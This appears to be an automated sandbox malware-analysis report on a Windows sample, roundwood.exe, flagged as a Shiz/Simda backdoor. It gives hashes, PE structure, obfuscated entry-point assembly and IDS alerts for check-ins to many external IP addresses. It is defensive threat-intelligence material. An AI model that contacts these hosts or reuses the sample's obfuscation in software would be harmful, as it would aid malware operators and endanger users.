SHA-512:	F483EC13F8F9B1C41EB1501FB017C876101D2F5E9C6CC3E457B3AB37E6CE2C8A180FA706E92D55669C7BB23651DD04D593B621DCC37809D019ECD3AD6B66CD6D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....'@.................8..]...h....<...0........@..................................9.+....................................(r.......................T...............................................................................................sX.....].......]...................@..@.RqVY...@....0......................@..@.i.......6...0...8.................. ..`.lziQh..I....p.......V..............@..@.EXGwv...9...........f..............@....data....]...........v..............@....I.......^...0......................@..@.E..................."..............@..@.rsrc................4..............@..@.reloc...............P..............@..B................................................................................................................................................................................................................................

C:\Windows\apppatch\svchost.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\roundwood.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.8083390185161425
TrID:	Win32 Executable (generic) a (10002005/4) 99.83% Windows Screen Saver (13104/52) 0.13% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	roundwood.exe
File size:	223'888 bytes
MD5:	ce11c26163587185b09cb6720e4f0d76
SHA1:	c95a87fc31ee79b9f141fac18dd95f75d8f31fba
SHA256:	dc1c6d303002b580188a6d25d471d95d5a001186f85db279aca2e2de98527b92
SHA512:	18fb4eb87ede103deb8264bb56813fe4e9dc1dedfffe319ddcf262902906ea94e7a0700ab5c5bcd1a314df381776f4a3a1ba2147bf9a71ae380d25decafabcfa
SSDEEP:	3072:Hvm4SZsQrNzPrl6rjGMjp39d4u8iqddCxMIJOb2o5DsBPjim6hwM2H6:P1SyAJp6rjn1gOObn4b6h9h
TLSH:	9A24027A8633145AC8250DF948DFDA071DBC435E2F2822360D99CB5F2EF37431AB6622
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....'@.................8..]...h....<...0........@....................................G...................................

File Icon


Icon Hash:	a4542527c184c651

Static PE Info

General

Entrypoint:	0x443c1b
Entrypoint Section:	.i
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x4027B28C [Mon Feb 9 16:17:16 2004 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	5dbe4621616d081e3440b0469a9471ca

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=VeriSign Class 3 Code Signing 2004 CA, OU=Terms of use at https://www.verisign.com/rpa (c)04, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	10/09/2006 20:00:00 24/11/2007 18:59:59
Subject Chain	CN=Symantec Corporation, OU=Symantec Research Labs, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=Symantec Corporation, L=Santa Monica, S=California, C=US
Version:	3
Thumbprint MD5:	D4CC22DC4F6D903F11EE1CEEEEAD13A2
Thumbprint SHA-1:	276C66B0A5B5F355D9B740303A7170B376257B5A
Thumbprint SHA-256:	06AE30D02F0672C6341CB0BC5AB32E459403891010104A26EFE7F98ABD4166A1
Serial:	01EDF8340CDF060C099E1A6472F76DB4

Entrypoint Preview

Instruction
mov dword ptr [0046D474h], 00000000h
mov eax, dword ptr [0046D474h]
mov esi, 00000000h
mov edx, esi
push edx
mov edi, 000DC133h
add edi, 003910A7h
push edi
mov dword ptr [0046D44Fh], 00000000h
mov esi, dword ptr [0046D44Fh]
push esi
call dword ptr [004470CCh]
mov dword ptr [0046D032h], eax
xor eax, eax
push 00000051h
pop esi
sub esi, 00000CB0h
test dword ptr [0046D32Ch], esi
jne 00007F501CE33401h
shl esi, 06h
and esi, 0000000Fh
sub esi, dword ptr [0046D26Eh]
add dword ptr [0046D383h], esi
push 00000988h
pop ebp
and ebp, 000000FFh
add ebp, 00000551h
jne 00007F501CE333F9h
and ebp, 00FFFFFFh
inc ebp
dec ebp
push ebp
pop dword ptr [0046D396h]
add dword ptr [0046D29Fh], ebp
mov edi, 00000061h
sub edi, BCC6B9B1h
jne 00007F501CE33E92h
mov dword ptr [0046D0E2h], eax
mov ebx, 00000000h
shr ebx, 03h
test dword ptr [0046D353h], ebx
je 00007F501CE333FBh
shl ebx, 1
mov edi, 000018FCh
xor edi, ebx
add dword ptr [0046D0F3h], ebx

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x47228	0xb4	.lziQh
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1ab000	0x1ac4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x35400	0x1690	.RqVY
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1ad000	0x3b6	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x49cac	0x1c	.EXGwv
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.sX	0x1000	0x135d	0x135d	581317baaced2942f61ab7ecb82969e9	False	0.7756707686100464	data	6.2529108972846785	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.RqVY	0x3000	0x3ff40	0x600	9ee15c846232cd08290a24bc3ece46b2	False	0.91015625	PGP Secret Sub-key -	6.756054817049547	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.i	0x43000	0x36b0	0x3800	59d5847fd0d85b1e23c3ff1ad8637feb	False	0.6780133928571429	data	5.967632184023219	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.lziQh	0x47000	0x1049	0x1000	dce93519fcb3efa29084a4e8e0032b39	False	0.417724609375	data	4.9458799591598295	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.EXGwv	0x49000	0x2399a	0x1000	b353cb16547fa95b777bd56871e8862f	False	0.717529296875	data	5.978580882178331	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data	0x6d000	0x85d19	0x29c00	6617325dca263ae19dbc0d7e61c3d342	False	0.9971580276946108	data	7.995569987755662	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.I	0xf3000	0x45e11	0x1000	def17aa66b683ba746c321ff03725de6	False	0.739013671875	data	6.000898720847474	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.E	0x139000	0x7101b	0x1200	e3ec98900184b705c85ef3c0711b495f	False	0.7003038194444444	data	5.80359967339437	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x1ab000	0x1ac4	0x1c00	23f1173f3e84886c912833c32fa2e961	False	0.634765625	data	5.314059067814752	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1ad000	0x3b6	0x400	6a410882061c509a8e71c0e91146df7b	False	0.912109375	data	6.730847700191025	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x1ab2bc	0x2a8	Device independent bitmap graphic, 10 x 20 x 24, image size 0	English	United States	0.9382352941176471
RT_ICON	0x1ab564	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.6367260787992496
RT_DIALOG	0x1ac60c	0x56	data	English	United States	0.9767441860465116
RT_RCDATA	0x1ac664	0x5c	data	English	United States	1.1195652173913044
RT_RCDATA	0x1ac6c0	0x13	data	English	United States	1.4210526315789473
RT_RCDATA	0x1ac6d4	0x50	data	English	United States	1.1375
RT_RCDATA	0x1ac724	0x59	data	English	United States	1.1235955056179776
RT_RCDATA	0x1ac780	0x62	data	English	United States	1.1122448979591837
RT_RCDATA	0x1ac7e4	0x63	data	English	United States	1.1111111111111112
RT_GROUP_ICON	0x1ac848	0x14	data	English	United States	1.1
RT_VERSION	0x1ac85c	0x268	MS Windows COFF Motorola 68000 object file	English	United States	0.538961038961039

Imports

DLL	Import
KERNEL32.DLL	CreatePipe, GetComputerNameA, GetCalendarInfoA, TlsAlloc, CreateDirectoryW, GetMailslotInfo, GetModuleFileNameW, GetCalendarInfoW, GetPriorityClass, GetUserDefaultLCID, GlobalFindAtomA, GetProcAddress, FindAtomW, FileTimeToLocalFileTime, EnumDateFormatsW, OpenEventA, GetLocaleInfoW, lstrcmpiW, SetLocaleInfoW, GetEnvironmentVariableW, GetExitCodeProcess, MulDiv, SetUnhandledExceptionFilter, GetNamedPipeInfo, EndUpdateResourceW, SetComputerNameA, GetProcessHeap, SetPriorityClass, FreeResource, GetModuleHandleW, QueryPerformanceFrequency, GetFileAttributesW, CompareStringA, LoadLibraryA, IsDebuggerPresent, HeapCreate, CreateNamedPipeW, GetThreadPriority, OpenMutexW, ExpandEnvironmentStringsA, lstrcmpi, GetEnvironmentStringsA, FileTimeToDosDateTime, GetCommandLineA, lstrcpynW, GetDiskFreeSpaceW, lstrcmp, GetCurrentDirectoryA
USER32.DLL	AnimateWindow, GetWindowRgn, GetClassInfoA, CreateDialogParamA, GetClassInfoExW, EnumChildWindows, RegisterClassA, DrawTextA, SetFocus, MessageBoxIndirectW, MonitorFromPoint, ClientToScreen, DefWindowProcA, LoadImageA, ActivateKeyboardLayout, GetTopWindow, LoadMenuIndirectA, MessageBoxA, GetDC, UnregisterClassW, mouse_event, GetMenuState, SetCursor, ShowCursor, IsDlgButtonChecked, CheckDlgButton, SetParent, keybd_event, DrawTextW, SetDlgItemInt, FrameRect, RegisterClassExW, RemoveMenu, SendMessageA, TrackPopupMenuEx, GetForegroundWindow, LoadMenuA, GetDlgItemTextW, CreateDialogIndirectParamW, SetDlgItemTextW, MessageBeep, SetActiveWindow, CharNextA, GetMenu, UpdateLayeredWindow, SetWindowLongA, CloseWindow, MessageBoxW, EndDialog, IsIconic, CreateAcceleratorTableA
gdi32.dll	PtInRegion, SetWorldTransform, CreateEnhMetaFileW, CreateDCW, CreateMetaFileW, TranslateCharsetInfo, EnumFontsA, ScaleViewportExtEx, CreateCompatibleDC, GetDIBits, RemoveFontResourceW, SetPixel, GetEnhMetaFileDescriptionA
ADVAPI32.DLL	RegCreateKeyExW, RegOpenKeyW, RegRestoreKeyA, RegOpenKeyA, RegSaveKeyW, RegReplaceKeyA
SHLWAPI.DLL	SHDeleteEmptyKeyA, PathFindNextComponentW, StrCpyW, PathStripPathA, SHCopyKeyW, PathIsURLW, SHRegQueryInfoUSKeyW, PathCreateFromUrlA
OLEAUT32.DLL	VarR4FromR8
WINMM.DLL	mciSendStringW, mciSendStringA
winspool.drv	DeleteFormA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-23T18:42:19.845636+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49724	80	192.168.2.5	85.17.31.122
2024-08-23T18:42:19.845636+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49724	80	192.168.2.5	85.17.31.122
2024-08-23T18:44:06.016069+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	50853	80	192.168.2.5	103.224.182.252
2024-08-23T18:44:06.016069+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	50853	80	192.168.2.5	103.224.182.252
2024-08-23T18:43:06.834133+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	63517	80	192.168.2.5	64.225.91.73
2024-08-23T18:43:06.834133+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	63517	80	192.168.2.5	64.225.91.73
2024-08-23T18:42:12.965416+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49712	80	192.168.2.5	3.94.10.34
2024-08-23T18:42:12.965416+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49712	80	192.168.2.5	3.94.10.34
2024-08-23T18:43:29.703955+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	62686	80	192.168.2.5	72.52.179.174
2024-08-23T18:43:29.703955+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	62686	80	192.168.2.5	72.52.179.174
2024-08-23T18:43:35.057591+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	59536	80	192.168.2.5	44.221.84.105
2024-08-23T18:43:35.057591+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	59536	80	192.168.2.5	44.221.84.105
2024-08-23T18:44:05.672351+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	50852	80	192.168.2.5	44.221.84.105
2024-08-23T18:44:05.672351+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	50852	80	192.168.2.5	44.221.84.105
2024-08-23T18:43:47.523223+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	50842	80	192.168.2.5	188.114.96.3
2024-08-23T18:43:47.523223+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	50842	80	192.168.2.5	188.114.96.3
2024-08-23T18:42:14.285919+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49719	80	192.168.2.5	154.212.231.82
2024-08-23T18:42:14.285919+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49719	80	192.168.2.5	154.212.231.82
2024-08-23T18:42:13.792588+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49707	80	192.168.2.5	188.114.96.3
2024-08-23T18:42:13.792588+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49707	80	192.168.2.5	188.114.96.3
2024-08-23T18:42:12.841493+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49709	80	192.168.2.5	3.64.163.50
2024-08-23T18:42:12.841493+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49709	80	192.168.2.5	3.64.163.50
2024-08-23T18:43:03.463861+0200	UDP	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	53	62838	1.1.1.1	192.168.2.5
2024-08-23T18:43:03.806190+0200	UDP	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	53	63695	1.1.1.1	192.168.2.5
2024-08-23T18:43:37.247409+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	59543	443	192.168.2.5	188.114.96.3
2024-08-23T18:42:14.780163+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49721	443	192.168.2.5	188.114.96.3
2024-08-23T18:42:46.293135+0200	UDP	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	53	50088	1.1.1.1	192.168.2.5
2024-08-23T18:43:06.931526+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	63518	80	192.168.2.5	44.221.84.105
2024-08-23T18:43:06.931526+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	63518	80	192.168.2.5	44.221.84.105
2024-08-23T18:43:37.767067+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	59544	80	192.168.2.5	154.212.231.82
2024-08-23T18:43:37.767067+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	59544	80	192.168.2.5	154.212.231.82
2024-08-23T18:44:06.377470+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	50851	80	192.168.2.5	154.85.183.50
2024-08-23T18:44:06.377470+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	50851	80	192.168.2.5	154.85.183.50
2024-08-23T18:42:12.933029+0200	TCP	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	80	49711	44.221.84.105	192.168.2.5
2024-08-23T18:42:12.933029+0200	TCP	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	80	49711	44.221.84.105	192.168.2.5
2024-08-23T18:42:12.784899+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49708	80	192.168.2.5	162.255.119.102
2024-08-23T18:42:12.784899+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49708	80	192.168.2.5	162.255.119.102
2024-08-23T18:42:13.180850+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49715	80	192.168.2.5	208.100.26.245
2024-08-23T18:42:13.180850+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49715	80	192.168.2.5	208.100.26.245
2024-08-23T18:43:35.027705+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	59532	80	192.168.2.5	44.221.84.105
2024-08-23T18:43:35.027705+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	59532	80	192.168.2.5	44.221.84.105
2024-08-23T18:43:03.648757+0200	UDP	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	53	62631	1.1.1.1	192.168.2.5
2024-08-23T18:43:35.103902+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	59528	80	192.168.2.5	162.255.119.102
2024-08-23T18:43:35.103902+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	59528	80	192.168.2.5	162.255.119.102
2024-08-23T18:42:14.726822+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49719	80	192.168.2.5	154.212.231.82
2024-08-23T18:42:14.726822+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49719	80	192.168.2.5	154.212.231.82
2024-08-23T18:42:24.303230+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49717	80	192.168.2.5	172.234.222.143
2024-08-23T18:42:24.303230+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49717	80	192.168.2.5	172.234.222.143
2024-08-23T18:43:07.276878+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	63519	80	192.168.2.5	103.224.212.210
2024-08-23T18:43:07.276878+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	63519	80	192.168.2.5	103.224.212.210
2024-08-23T18:42:13.059217+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49715	80	192.168.2.5	208.100.26.245
2024-08-23T18:42:13.059217+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49715	80	192.168.2.5	208.100.26.245
2024-08-23T18:43:07.701206+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	63521	80	192.168.2.5	154.85.183.50
2024-08-23T18:43:07.701206+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	63521	80	192.168.2.5	154.85.183.50
2024-08-23T18:42:57.405298+0200	UDP	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	53	53531	1.1.1.1	192.168.2.5
2024-08-23T18:42:12.969463+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49713	80	192.168.2.5	18.208.156.248
2024-08-23T18:42:12.969463+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49713	80	192.168.2.5	18.208.156.248
2024-08-23T18:43:36.336824+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	59534	80	192.168.2.5	199.191.50.83
2024-08-23T18:43:36.336824+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	59534	80	192.168.2.5	199.191.50.83
2024-08-23T18:43:48.600216+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	50844	80	192.168.2.5	103.150.11.230
2024-08-23T18:43:48.600216+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	50844	80	192.168.2.5	103.150.11.230
2024-08-23T18:43:31.676842+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49369	80	192.168.2.5	52.34.198.229
2024-08-23T18:43:31.676842+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49369	80	192.168.2.5	52.34.198.229
2024-08-23T18:42:29.671762+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49733	80	192.168.2.5	103.150.11.230
2024-08-23T18:42:29.671762+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49733	80	192.168.2.5	103.150.11.230
2024-08-23T18:42:13.792580+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49718	80	192.168.2.5	91.195.240.19
2024-08-23T18:42:13.140368+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49716	80	192.168.2.5	69.162.80.57
2024-08-23T18:42:13.140368+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49716	80	192.168.2.5	69.162.80.57
2024-08-23T18:43:28.678792+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	62684	80	192.168.2.5	64.225.91.73
2024-08-23T18:43:28.678792+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	62684	80	192.168.2.5	64.225.91.73
2024-08-23T18:43:48.002079+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	50846	443	192.168.2.5	188.114.96.3
2024-08-23T18:44:06.122015+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	61321	80	192.168.2.5	103.224.212.210
2024-08-23T18:44:06.122015+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	61321	80	192.168.2.5	103.224.212.210
2024-08-23T18:43:03.621686+0200	UDP	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	53	52863	1.1.1.1	192.168.2.5
2024-08-23T18:43:35.112054+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	59538	80	192.168.2.5	69.162.80.57
2024-08-23T18:43:35.112054+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	59538	80	192.168.2.5	69.162.80.57
2024-08-23T18:43:38.456170+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	59545	80	192.168.2.5	85.17.31.122
2024-08-23T18:43:38.456170+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	59545	80	192.168.2.5	85.17.31.122
2024-08-23T18:43:01.800134+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	60696	443	192.168.2.5	188.114.96.3
2024-08-23T18:42:57.224227+0200	UDP	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	53	50316	1.1.1.1	192.168.2.5
2024-08-23T18:42:12.965688+0200	TCP	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	80	49712	3.94.10.34	192.168.2.5
2024-08-23T18:42:12.965688+0200	TCP	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	80	49712	3.94.10.34	192.168.2.5
2024-08-23T18:43:51.440659+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	50848	443	192.168.2.5	188.114.96.3
2024-08-23T18:43:35.574502+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	59539	443	192.168.2.5	188.114.96.3
2024-08-23T18:43:45.947600+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	59546	80	192.168.2.5	172.234.222.143
2024-08-23T18:43:45.947600+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	59546	80	192.168.2.5	172.234.222.143
2024-08-23T18:42:28.944979+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49737	443	192.168.2.5	188.114.96.3
2024-08-23T18:43:38.160164+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	59544	80	192.168.2.5	154.212.231.82
2024-08-23T18:43:38.160164+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	59544	80	192.168.2.5	154.212.231.82
2024-08-23T18:42:36.380226+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49728	80	192.168.2.5	13.248.169.48
2024-08-23T18:42:36.380226+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49728	80	192.168.2.5	13.248.169.48
2024-08-23T18:43:35.179648+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	59537	80	192.168.2.5	208.100.26.245
2024-08-23T18:43:35.179648+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	59537	80	192.168.2.5	208.100.26.245
2024-08-23T18:43:03.704038+0200	UDP	2021022	ET MALWARE Wapack Labs Sinkhole DNS Reply	1	53	64700	1.1.1.1	192.168.2.5
2024-08-23T18:43:47.172572+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	50844	80	192.168.2.5	103.150.11.230
2024-08-23T18:43:47.172572+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	50844	80	192.168.2.5	103.150.11.230
2024-08-23T18:42:17.944239+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49723	443	192.168.2.5	188.114.96.3
2024-08-23T18:43:50.959353+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	50842	80	192.168.2.5	188.114.96.3
2024-08-23T18:43:50.959353+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	50842	80	192.168.2.5	188.114.96.3
2024-08-23T18:42:17.939719+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	49722	80	192.168.2.5	85.17.31.122
2024-08-23T18:42:17.939719+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	49722	80	192.168.2.5	85.17.31.122
2024-08-23T18:43:35.007208+0200	TCP	2803437	ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin	1	59529	80	192.168.2.5	3.64.163.50
2024-08-23T18:43:35.007208+0200	TCP	2804852	ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin	1	59529	80	192.168.2.5	3.64.163.50
